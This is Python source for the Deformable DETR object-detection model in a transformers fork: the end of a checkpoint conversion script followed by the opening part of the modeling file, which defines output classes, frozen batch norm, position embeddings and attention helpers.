    # prepare image
    img = prepare_img()
    encoding = feature_extractor(images=img, return_tensors="pt")
    pixel_values = encoding["pixel_values"]

    logger.info("Converting model...")

    # load original state dict
    state_dict = torch.load(checkpoint_path, map_location="cpu")["model"]
    # rename keys
    for key in state_dict.copy().keys():
        val = state_dict.pop(key)
        state_dict[rename_key(key)] = val
    # query, key and value matrices need special treatment
    read_in_q_k_v(state_dict)
    # important: we need to prepend a prefix to each of the base model keys as the head models use different attributes for them
    prefix = "model."
    for key in state_dict.copy().keys():
        if not key.startswith("class_embed") and not key.startswith("bbox_embed"):
            val = state_dict.pop(key)
            state_dict[prefix + key] = val
    # finally, create HuggingFace model and load state dict
    model = DeformableDetrForObjectDetection(config)
    model.load_state_dict(state_dict)
    model.eval()
    device = "cuda" if torch.cuda.is_available() else "cpu"
    model.to(device)
    # verify our conversion: the expected tensors below are per-variant reference values
    # checked against the model's outputs on the test image.
    outputs = model(pixel_values.to(device))
    expected_logits = torch.tensor(
        [[-9.6645, -4.3449, -5.8705], [-9.7035, -3.8504, -5.0724], [-10.5634, -5.3379, -7.5116]]
    )
    expected_boxes = torch.tensor([[0.8693, 0.2289, 0.2492], [0.3150, 0.5489, 0.5845], [0.5563, 0.7580, 0.8518]])

    if single_scale:
        expected_logits = torch.tensor(
            [[-9.9051, -4.2541, -6.4852], [-9.6947, -4.0854, -6.8033], [-10.0665, -5.8470, -7.7003]]
        )
        expected_boxes = torch.tensor([[0.7292, 0.4991, 0.5532], [0.7959, 0.2426, 0.4236], [0.7582, 0.3518, 0.4451]])

    if single_scale and dilation:
        expected_logits = torch.tensor(
            [[-8.9652, -4.1074, -5.6635], [-9.0596, -4.9447, -6.6075], [-10.1178, -4.5275, -6.2671]]
        )
        expected_boxes = torch.tensor([[0.7665, 0.4130, 0.4769], [0.8364, 0.1841, 0.3391], [0.6261, 0.3895, 0.7978]])

    if with_box_refine:
        expected_logits = torch.tensor(
            [[-8.8895, -5.4187, -6.8153], [-8.4706, -6.1668, -7.6184], [-9.0042, -5.5359, -6.9141]]
        )
        expected_boxes = torch.tensor([[0.7828, 0.2208, 0.4323], [0.0892, 0.5996, 0.1319], [0.5524, 0.6389, 0.8914]])

    if with_box_refine and two_stage:
        expected_logits = torch.tensor(
            [[-6.7108, -4.3213, -6.3777], [-8.9014, -6.1799, -6.7240], [-6.9315, -4.4735, -6.2298]]
        )
        expected_boxes = torch.tensor([[0.2583, 0.5499, 0.4683], [0.7652, 0.9068, 0.4882], [0.5490, 0.2763, 0.0564]])

    print("Logits:", outputs.logits[0, :3, :3])

    assert torch.allclose(outputs.logits[0, :3, :3], expected_logits.to(device), atol=1e-4)
    assert torch.allclose(outputs.pred_boxes[0, :3, :3], expected_boxes.to(device), atol=1e-4)

    print("Everything ok!")

    # Save model and feature extractor
    logger.info(f"Saving PyTorch model and feature extractor to {pytorch_dump_folder_path}...")
    Path(pytorch_dump_folder_path).mkdir(exist_ok=True)
    model.save_pretrained(pytorch_dump_folder_path)
    feature_extractor.save_pretrained(pytorch_dump_folder_path)

    # Push to hub
    if push_to_hub:
        # Build the repo name from the enabled variant flags.
        model_name = "deformable-detr"
        model_name += "-single-scale" if single_scale else ""
        model_name += "-dc5" if dilation else ""
        model_name += "-with-box-refine" if with_box_refine else ""
        model_name += "-two-stage" if two_stage else ""
        print("Pushing model to hub...")
        model.push_to_hub(repo_path_or_name=model_name, organization="nielsr", commit_message="Add model")
if __name__ == "__main__":
    # CLI entry point: flags mirror the config attributes set in `convert_deformable_detr_checkpoint`.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--checkpoint_path",
        type=str,
        default="/home/niels/checkpoints/deformable_detr/r50_deformable_detr-checkpoint.pth",
        help="Path to Pytorch checkpoint (.pth file) you'd like to convert.",
    )
    parser.add_argument("--single_scale", action="store_true", help="Whether to set config.num_features_levels = 1.")
    parser.add_argument("--dilation", action="store_true", help="Whether to set config.dilation=True.")
    parser.add_argument("--with_box_refine", action="store_true", help="Whether to set config.with_box_refine=True.")
    parser.add_argument("--two_stage", action="store_true", help="Whether to set config.two_stage=True.")
    parser.add_argument(
        "--pytorch_dump_folder_path",
        default=None,
        type=str,
        required=True,
        help="Path to the folder to output PyTorch model.",
    )
    parser.add_argument(
        "--push_to_hub", action="store_true", help="Whether or not to push the converted model to the 🤗 hub."
    )
    args = parser.parse_args()
    convert_deformable_detr_checkpoint(
        args.checkpoint_path,
        args.single_scale,
        args.dilation,
        args.with_box_refine,
        args.two_stage,
        args.pytorch_dump_folder_path,
        args.push_to_hub,
    )
|
27182812/ChatGLM-LLaMA-chinese-insturct | 119,286 | src/transformers/models/deformable_detr/modeling_deformable_detr.py | # coding=utf-8
# Copyright 2022 SenseTime and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch Deformable DETR model."""
import copy
import math
import warnings
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
import torch
import torch.nn.functional as F
from torch import Tensor, nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from ...activations import ACT2FN
from ...file_utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_scipy_available,
is_timm_available,
is_torch_cuda_available,
is_vision_available,
replace_return_docstrings,
requires_backends,
)
from ...modeling_outputs import BaseModelOutput
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import meshgrid, torch_int_div
from ...utils import is_ninja_available, logging
from ..auto import AutoBackbone
from .configuration_deformable_detr import DeformableDetrConfig
from .load_custom import load_cuda_kernels
logger = logging.get_logger(__name__)

# Move this to not compile only when importing, this needs to happen later, like in __init__.
# Best-effort compilation of the custom multi-scale deformable attention CUDA kernel.
# Requires both a CUDA-enabled torch build and ninja; on any failure the module-level
# `MultiScaleDeformableAttention` stays None and callers fall back to the pure-PyTorch
# implementation (`multi_scale_deformable_attention` below).
if is_torch_cuda_available() and is_ninja_available():
    logger.info("Loading custom CUDA kernels...")
    try:
        MultiScaleDeformableAttention = load_cuda_kernels()
    except Exception as e:
        logger.warning(f"Could not load the custom kernel for multi-scale deformable attention: {e}")
        MultiScaleDeformableAttention = None
else:
    MultiScaleDeformableAttention = None

if is_vision_available():
    # Only needed for box post-processing; guarded so the model imports without vision extras.
    from transformers.image_transforms import center_to_corners_format
class MultiScaleDeformableAttentionFunction(Function):
    """
    Autograd wrapper around the custom CUDA multi-scale deformable attention kernel.

    NOTE(review): only usable when the module-level `MultiScaleDeformableAttention` kernel
    compiled successfully at import time; callers guard `apply` with try/except and fall
    back to the pure-PyTorch path.
    """

    @staticmethod
    def forward(
        context,
        value,
        value_spatial_shapes,
        value_level_start_index,
        sampling_locations,
        attention_weights,
        im2col_step,
    ):
        # Stash the batch chunk size so backward can replay the kernel with it.
        context.im2col_step = im2col_step
        output = MultiScaleDeformableAttention.ms_deform_attn_forward(
            value,
            value_spatial_shapes,
            value_level_start_index,
            sampling_locations,
            attention_weights,
            context.im2col_step,
        )
        context.save_for_backward(
            value, value_spatial_shapes, value_level_start_index, sampling_locations, attention_weights
        )
        return output

    @staticmethod
    @once_differentiable
    def backward(context, grad_output):
        (
            value,
            value_spatial_shapes,
            value_level_start_index,
            sampling_locations,
            attention_weights,
        ) = context.saved_tensors
        grad_value, grad_sampling_loc, grad_attn_weight = MultiScaleDeformableAttention.ms_deform_attn_backward(
            value,
            value_spatial_shapes,
            value_level_start_index,
            sampling_locations,
            attention_weights,
            grad_output,
            context.im2col_step,
        )

        # Gradients align 1:1 with forward's inputs; spatial shapes, level start indices and
        # im2col_step are non-differentiable, hence the `None`s.
        return grad_value, None, None, grad_sampling_loc, grad_attn_weight, None
if is_scipy_available():
    # Hungarian matching in the loss computation.
    from scipy.optimize import linear_sum_assignment

if is_timm_available():
    from timm import create_model

# NOTE(review): a duplicate `logger = logging.get_logger(__name__)` used to live here; the
# module logger is already created once near the top of the file, so it was removed.
_CONFIG_FOR_DOC = "DeformableDetrConfig"
_CHECKPOINT_FOR_DOC = "sensetime/deformable-detr"

DEFORMABLE_DETR_PRETRAINED_MODEL_ARCHIVE_LIST = [
    "sensetime/deformable-detr",
    # See all Deformable DETR models at https://huggingface.co/models?filter=deformable-detr
]
@dataclass
class DeformableDetrDecoderOutput(ModelOutput):
    """
    Base class for outputs of the DeformableDetrDecoder. This class adds two attributes to
    BaseModelOutputWithCrossAttentions, namely:
    - a stacked tensor of intermediate decoder hidden states (i.e. the output of each decoder layer)
    - a stacked tensor of intermediate reference points.

    Args:
        last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
            Sequence of hidden-states at the output of the last layer of the model.
        intermediate_hidden_states (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, hidden_size)`):
            Stacked intermediate hidden states (output of each layer of the decoder).
        intermediate_reference_points (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, sequence_length, hidden_size)`):
            Stacked intermediate reference points (reference points of each layer of the decoder).
        hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer
            plus the initial embedding outputs.
        attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
            the self-attention heads.
        cross_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` and `config.add_cross_attention=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`. Attentions weights of the decoder's cross-attention layer, after the attention softmax,
            used to compute the weighted average in the cross-attention heads.
    """

    last_hidden_state: torch.FloatTensor = None
    # Per-layer decoder outputs / reference points, used for auxiliary losses and box refinement.
    intermediate_hidden_states: torch.FloatTensor = None
    intermediate_reference_points: torch.FloatTensor = None
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    attentions: Optional[Tuple[torch.FloatTensor]] = None
    cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class DeformableDetrModelOutput(ModelOutput):
    """
    Base class for outputs of the Deformable DETR encoder-decoder model.

    Args:
        init_reference_points (`torch.FloatTensor` of shape  `(batch_size, num_queries, 4)`):
            Initial reference points sent through the Transformer decoder.
        last_hidden_state (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`):
            Sequence of hidden-states at the output of the last layer of the decoder of the model.
        intermediate_hidden_states (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, hidden_size)`):
            Stacked intermediate hidden states (output of each layer of the decoder).
        intermediate_reference_points (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, 4)`):
            Stacked intermediate reference points (reference points of each layer of the decoder).
        decoder_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, num_queries, hidden_size)`. Hidden-states of the decoder at the output of each layer
            plus the initial embedding outputs.
        decoder_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, num_queries,
            num_queries)`. Attentions weights of the decoder, after the attention softmax, used to compute the weighted
            average in the self-attention heads.
        cross_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_queries, num_heads, 4, 4)`.
            Attentions weights of the decoder's cross-attention layer, after the attention softmax, used to compute the
            weighted average in the cross-attention heads.
        encoder_last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
            Sequence of hidden-states at the output of the last layer of the encoder of the model.
        encoder_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the encoder at the output of each
            layer plus the initial embedding outputs.
        encoder_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_queries, num_heads, 4, 4)`.
            Attentions weights of the encoder, after the attention softmax, used to compute the weighted average in the
            self-attention heads.
        enc_outputs_class (`torch.FloatTensor` of shape `(batch_size, sequence_length, config.num_labels)`, *optional*, returned when `config.with_box_refine=True` and `config.two_stage=True`):
            Predicted bounding boxes scores where the top `config.two_stage_num_proposals` scoring bounding boxes are
            picked as region proposals in the first stage. Output of bounding box binary classification (i.e.
            foreground and background).
        enc_outputs_coord_logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, 4)`, *optional*, returned when `config.with_box_refine=True` and `config.two_stage=True`):
            Logits of predicted bounding boxes coordinates in the first stage.
    """

    init_reference_points: torch.FloatTensor = None
    last_hidden_state: torch.FloatTensor = None
    intermediate_hidden_states: torch.FloatTensor = None
    intermediate_reference_points: torch.FloatTensor = None
    decoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    decoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
    cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
    encoder_last_hidden_state: Optional[torch.FloatTensor] = None
    encoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    encoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
    # Only populated in the two-stage variant (config.two_stage=True).
    enc_outputs_class: Optional[torch.FloatTensor] = None
    enc_outputs_coord_logits: Optional[torch.FloatTensor] = None
@dataclass
class DeformableDetrObjectDetectionOutput(ModelOutput):
    """
    Output type of [`DeformableDetrForObjectDetection`].

    Args:
        loss (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `labels` are provided)):
            Total loss as a linear combination of a negative log-likelihood (cross-entropy) for class prediction and a
            bounding box loss. The latter is defined as a linear combination of the L1 loss and the generalized
            scale-invariant IoU loss.
        loss_dict (`Dict`, *optional*):
            A dictionary containing the individual losses. Useful for logging.
        logits (`torch.FloatTensor` of shape `(batch_size, num_queries, num_classes + 1)`):
            Classification logits (including no-object) for all queries.
        pred_boxes (`torch.FloatTensor` of shape `(batch_size, num_queries, 4)`):
            Normalized boxes coordinates for all queries, represented as (center_x, center_y, width, height). These
            values are normalized in [0, 1], relative to the size of each individual image in the batch (disregarding
            possible padding). You can use [`~DeformableDetrProcessor.post_process_object_detection`] to retrieve the
            unnormalized bounding boxes.
        auxiliary_outputs (`list[Dict]`, *optional*):
            Optional, only returned when auxiliary losses are activated (i.e. `config.auxiliary_loss` is set to `True`)
            and labels are provided. It is a list of dictionaries containing the two above keys (`logits` and
            `pred_boxes`) for each decoder layer.
        last_hidden_state (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`, *optional*):
            Sequence of hidden-states at the output of the last layer of the decoder of the model.
        decoder_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, num_queries, hidden_size)`. Hidden-states of the decoder at the output of each layer
            plus the initial embedding outputs.
        decoder_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, num_queries,
            num_queries)`. Attentions weights of the decoder, after the attention softmax, used to compute the weighted
            average in the self-attention heads.
        cross_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_queries, num_heads, 4, 4)`.
            Attentions weights of the decoder's cross-attention layer, after the attention softmax, used to compute the
            weighted average in the cross-attention heads.
        encoder_last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
            Sequence of hidden-states at the output of the last layer of the encoder of the model.
        encoder_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the encoder at the output of each
            layer plus the initial embedding outputs.
        encoder_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, sequence_length, num_heads, 4,
            4)`. Attentions weights of the encoder, after the attention softmax, used to compute the weighted average
            in the self-attention heads.
        intermediate_hidden_states (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, hidden_size)`):
            Stacked intermediate hidden states (output of each layer of the decoder).
        intermediate_reference_points (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, 4)`):
            Stacked intermediate reference points (reference points of each layer of the decoder).
        init_reference_points (`torch.FloatTensor` of shape  `(batch_size, num_queries, 4)`):
            Initial reference points sent through the Transformer decoder.
        enc_outputs_class (`torch.FloatTensor` of shape `(batch_size, sequence_length, config.num_labels)`, *optional*, returned when `config.with_box_refine=True` and `config.two_stage=True`):
            Predicted bounding boxes scores where the top `config.two_stage_num_proposals` scoring bounding boxes are
            picked as region proposals in the first stage. Output of bounding box binary classification (i.e.
            foreground and background).
        enc_outputs_coord_logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, 4)`, *optional*, returned when `config.with_box_refine=True` and `config.two_stage=True`):
            Logits of predicted bounding boxes coordinates in the first stage.
    """

    loss: Optional[torch.FloatTensor] = None
    loss_dict: Optional[Dict] = None
    logits: torch.FloatTensor = None
    pred_boxes: torch.FloatTensor = None
    auxiliary_outputs: Optional[List[Dict]] = None
    init_reference_points: Optional[torch.FloatTensor] = None
    last_hidden_state: Optional[torch.FloatTensor] = None
    intermediate_hidden_states: Optional[torch.FloatTensor] = None
    intermediate_reference_points: Optional[torch.FloatTensor] = None
    decoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    decoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
    cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
    encoder_last_hidden_state: Optional[torch.FloatTensor] = None
    encoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    encoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
    # Fix: these were annotated as bare `Optional` (i.e. Optional[Any]); they hold tensors,
    # matching DeformableDetrModelOutput.
    enc_outputs_class: Optional[torch.FloatTensor] = None
    enc_outputs_coord_logits: Optional[torch.FloatTensor] = None
def _get_clones(module, N):
return nn.ModuleList([copy.deepcopy(module) for i in range(N)])
def inverse_sigmoid(x, eps=1e-5):
    """
    Numerically stable inverse of `torch.sigmoid` (the logit function).

    `x` is clamped to [0, 1] first, and both the value and its complement are floored at
    `eps` so the logarithm never sees zero.
    """
    probs = x.clamp(min=0, max=1)
    numerator = probs.clamp(min=eps)
    denominator = (1 - probs).clamp(min=eps)
    return torch.log(numerator / denominator)
# Copied from transformers.models.detr.modeling_detr.DetrFrozenBatchNorm2d with Detr->DeformableDetr
class DeformableDetrFrozenBatchNorm2d(nn.Module):
    """
    BatchNorm2d with frozen batch statistics and affine parameters.

    Equivalent to `torchvision.misc.ops.FrozenBatchNorm2d`, but with an epsilon added before
    the reciprocal square root — without it, models other than
    torchvision.models.resnet[18,34,50,101] produce NaNs.
    """

    def __init__(self, n):
        super().__init__()
        # Buffers, not Parameters: they must never be updated by the optimizer.
        for buffer_name, init_value in (
            ("weight", torch.ones(n)),
            ("bias", torch.zeros(n)),
            ("running_mean", torch.zeros(n)),
            ("running_var", torch.ones(n)),
        ):
            self.register_buffer(buffer_name, init_value)

    def _load_from_state_dict(
        self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs
    ):
        # Regular BatchNorm2d checkpoints carry a `num_batches_tracked` entry this frozen
        # variant does not have; drop it so loading does not flag it as unexpected.
        state_dict.pop(prefix + "num_batches_tracked", None)
        super()._load_from_state_dict(
            state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs
        )

    def forward(self, x):
        # Fold the frozen statistics into a single per-channel scale and shift, reshaped to
        # broadcast over (batch, channel, height, width).
        epsilon = 1e-5
        scale = self.weight.reshape(1, -1, 1, 1) * (self.running_var.reshape(1, -1, 1, 1) + epsilon).rsqrt()
        shift = self.bias.reshape(1, -1, 1, 1) - self.running_mean.reshape(1, -1, 1, 1) * scale
        return x * scale + shift
# Copied from transformers.models.detr.modeling_detr.replace_batch_norm with Detr->DeformableDetr
def replace_batch_norm(m, name=""):
    """
    Recursively swap every `nn.BatchNorm2d` in `m` for a `DeformableDetrFrozenBatchNorm2d`
    carrying the same weights and running statistics (modifies `m` in place).
    """
    for attr_name in dir(m):
        candidate = getattr(m, attr_name)
        if isinstance(candidate, nn.BatchNorm2d):
            frozen = DeformableDetrFrozenBatchNorm2d(candidate.num_features)
            frozen.weight.data.copy_(candidate.weight)
            frozen.bias.data.copy_(candidate.bias)
            frozen.running_mean.data.copy_(candidate.running_mean)
            frozen.running_var.data.copy_(candidate.running_var)
            setattr(m, attr_name, frozen)
    for child_name, child in m.named_children():
        replace_batch_norm(child, child_name)
class DeformableDetrConvEncoder(nn.Module):
    """
    Convolutional backbone, using either the AutoBackbone API or one from the timm library.

    nn.BatchNorm2d layers are replaced by DeformableDetrFrozenBatchNorm2d as defined above.
    """

    def __init__(self, config):
        super().__init__()

        self.config = config

        if config.use_timm_backbone:
            requires_backends(self, ["timm"])
            kwargs = {}
            if config.dilation:
                # Dilation keeps the output stride at 16 instead of the default 32,
                # producing higher-resolution feature maps.
                kwargs["output_stride"] = 16
            # Multi-scale models take the last three stage outputs; otherwise only the last.
            backbone = create_model(
                config.backbone,
                pretrained=config.use_pretrained_backbone,
                features_only=True,
                out_indices=(2, 3, 4) if config.num_feature_levels > 1 else (4,),
                in_chans=config.num_channels,
                **kwargs,
            )
        else:
            backbone = AutoBackbone.from_config(config.backbone_config)

        # replace batch norm by frozen batch norm
        with torch.no_grad():
            replace_batch_norm(backbone)
        self.model = backbone
        self.intermediate_channel_sizes = (
            self.model.feature_info.channels() if config.use_timm_backbone else self.model.channels
        )

        # For ResNet backbones, freeze everything except the later stages
        # (timm names them layer2-4; HF backbones name them stage.1-3).
        backbone_model_type = config.backbone if config.use_timm_backbone else config.backbone_config.model_type
        if "resnet" in backbone_model_type:
            for name, parameter in self.model.named_parameters():
                if config.use_timm_backbone:
                    if "layer2" not in name and "layer3" not in name and "layer4" not in name:
                        parameter.requires_grad_(False)
                else:
                    if "stage.1" not in name and "stage.2" not in name and "stage.3" not in name:
                        parameter.requires_grad_(False)

    # Copied from transformers.models.detr.modeling_detr.DetrConvEncoder.forward with Detr->DeformableDetr
    def forward(self, pixel_values: torch.Tensor, pixel_mask: torch.Tensor):
        # send pixel_values through the model to get list of feature maps
        features = self.model(pixel_values) if self.config.use_timm_backbone else self.model(pixel_values).feature_maps

        out = []
        for feature_map in features:
            # downsample pixel_mask to match shape of corresponding feature_map
            mask = nn.functional.interpolate(pixel_mask[None].float(), size=feature_map.shape[-2:]).to(torch.bool)[0]
            out.append((feature_map, mask))
        return out
# Copied from transformers.models.detr.modeling_detr.DetrConvModel with Detr->DeformableDetr
class DeformableDetrConvModel(nn.Module):
    """
    Pairs a convolutional encoder with a position-embedding module: for every intermediate
    feature map produced by the encoder, the matching 2D position embedding is computed.
    """

    def __init__(self, conv_encoder, position_embedding):
        super().__init__()
        self.conv_encoder = conv_encoder
        self.position_embedding = position_embedding

    def forward(self, pixel_values, pixel_mask):
        # The encoder yields (feature_map, downsampled_mask) pairs, one per feature level.
        features = self.conv_encoder(pixel_values, pixel_mask)
        # One position embedding per feature level, cast to the feature map's dtype.
        embeddings = [
            self.position_embedding(feature_map, mask).to(feature_map.dtype) for feature_map, mask in features
        ]
        return features, embeddings
# Copied from transformers.models.detr.modeling_detr._expand_mask
def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, target_len: Optional[int] = None):
"""
Expands attention_mask from `[batch_size, seq_len]` to `[batch_size, 1, target_seq_len, source_seq_len]`.
"""
batch_size, source_len = mask.size()
target_len = target_len if target_len is not None else source_len
expanded_mask = mask[:, None, None, :].expand(batch_size, 1, target_len, source_len).to(dtype)
inverted_mask = 1.0 - expanded_mask
return inverted_mask.masked_fill(inverted_mask.bool(), torch.finfo(dtype).min)
class DeformableDetrSinePositionEmbedding(nn.Module):
    """
    This is a more standard version of the position embedding, very similar to the one used by the Attention is all you
    need paper, generalized to work on images.
    """

    def __init__(self, embedding_dim=64, temperature=10000, normalize=False, scale=None):
        super().__init__()
        self.embedding_dim = embedding_dim
        self.temperature = temperature
        self.normalize = normalize
        if scale is not None and normalize is False:
            raise ValueError("normalize should be True if scale is passed")
        if scale is None:
            scale = 2 * math.pi
        self.scale = scale

    def forward(self, pixel_values, pixel_mask):
        if pixel_mask is None:
            raise ValueError("No pixel mask provided")
        # Cumulative sums over the mask give every valid pixel its (1-based) y/x coordinate,
        # ignoring padded positions.
        y_embed = pixel_mask.cumsum(1, dtype=torch.float32)
        x_embed = pixel_mask.cumsum(2, dtype=torch.float32)
        if self.normalize:
            eps = 1e-6
            y_embed = (y_embed - 0.5) / (y_embed[:, -1:, :] + eps) * self.scale
            x_embed = (x_embed - 0.5) / (x_embed[:, :, -1:] + eps) * self.scale

        dim_t = torch.arange(self.embedding_dim, dtype=torch.float32, device=pixel_values.device)
        # Fix: the frequency exponent is 2 * (i // 2) / embedding_dim — pairs of channels share
        # a frequency, as in "Attention Is All You Need". The previous code floor-divided
        # `dim_t` by `2 / embedding_dim` (a fraction), blowing the exponent up so
        # `temperature ** (...)` overflowed to inf.
        dim_t = self.temperature ** (2 * torch_int_div(dim_t, 2) / self.embedding_dim)

        pos_x = x_embed[:, :, :, None] / dim_t
        pos_y = y_embed[:, :, :, None] / dim_t
        # Interleave sin (even channels) and cos (odd channels) over the embedding dimension.
        pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, :, :, 1::2].cos()), dim=4).flatten(3)
        pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3)
        pos = torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2)
        return pos
# Copied from transformers.models.detr.modeling_detr.DetrLearnedPositionEmbedding
class DeformableDetrLearnedPositionEmbedding(nn.Module):
    """
    Learned 2D position embeddings for feature maps up to 50x50.

    Row and column positions each get an `embedding_dim`-sized learned vector; the embedding
    at (y, x) is the concatenation [column_embedding(x), row_embedding(y)].
    """

    def __init__(self, embedding_dim=256):
        super().__init__()
        self.row_embeddings = nn.Embedding(50, embedding_dim)
        self.column_embeddings = nn.Embedding(50, embedding_dim)

    def forward(self, pixel_values, pixel_mask=None):
        height, width = pixel_values.shape[-2:]
        x_embeddings = self.column_embeddings(torch.arange(width, device=pixel_values.device))
        y_embeddings = self.row_embeddings(torch.arange(height, device=pixel_values.device))
        # Broadcast the 1D row/column embeddings over the full (height, width) grid.
        grid = torch.cat(
            [
                x_embeddings.unsqueeze(0).repeat(height, 1, 1),
                y_embeddings.unsqueeze(1).repeat(1, width, 1),
            ],
            dim=-1,
        )
        # (height, width, 2*dim) -> (batch_size, 2*dim, height, width)
        return grid.permute(2, 0, 1).unsqueeze(0).repeat(pixel_values.shape[0], 1, 1, 1)
# Copied from transformers.models.detr.modeling_detr.build_position_encoding with Detr->DeformableDetr
def build_position_encoding(config):
    """
    Build the position-embedding module selected by `config.position_embedding_type`
    ("sine" or "learned"); each spatial axis gets half of `config.d_model`.
    """
    n_steps = config.d_model // 2
    embedding_type = config.position_embedding_type
    if embedding_type == "sine":
        # TODO find a better way of exposing other arguments
        return DeformableDetrSinePositionEmbedding(n_steps, normalize=True)
    if embedding_type == "learned":
        return DeformableDetrLearnedPositionEmbedding(n_steps)
    raise ValueError(f"Not supported {embedding_type}")
def multi_scale_deformable_attention(
    value: Tensor, value_spatial_shapes: Tensor, sampling_locations: Tensor, attention_weights: Tensor
) -> Tensor:
    """
    Pure-PyTorch fallback for multi-scale deformable attention (used when the custom CUDA
    kernel is unavailable).

    Args:
        value: `(batch_size, sum(H_l * W_l), num_heads, head_dim)` flattened multi-level features.
        value_spatial_shapes: `(num_levels, 2)` per-level (height, width).
        sampling_locations: `(batch_size, num_queries, num_heads, num_levels, num_points, 2)`,
            normalized to [0, 1].
        attention_weights: `(batch_size, num_queries, num_heads, num_levels, num_points)`.

    Returns:
        `(batch_size, num_queries, num_heads * head_dim)` attended features.
    """
    batch_size, _, num_heads, head_dim = value.shape
    _, num_queries, _, num_levels, num_points, _ = sampling_locations.shape
    per_level_values = value.split([height * width for height, width in value_spatial_shapes], dim=1)
    # grid_sample expects coordinates in [-1, 1].
    sampling_grids = 2 * sampling_locations - 1
    sampled = []
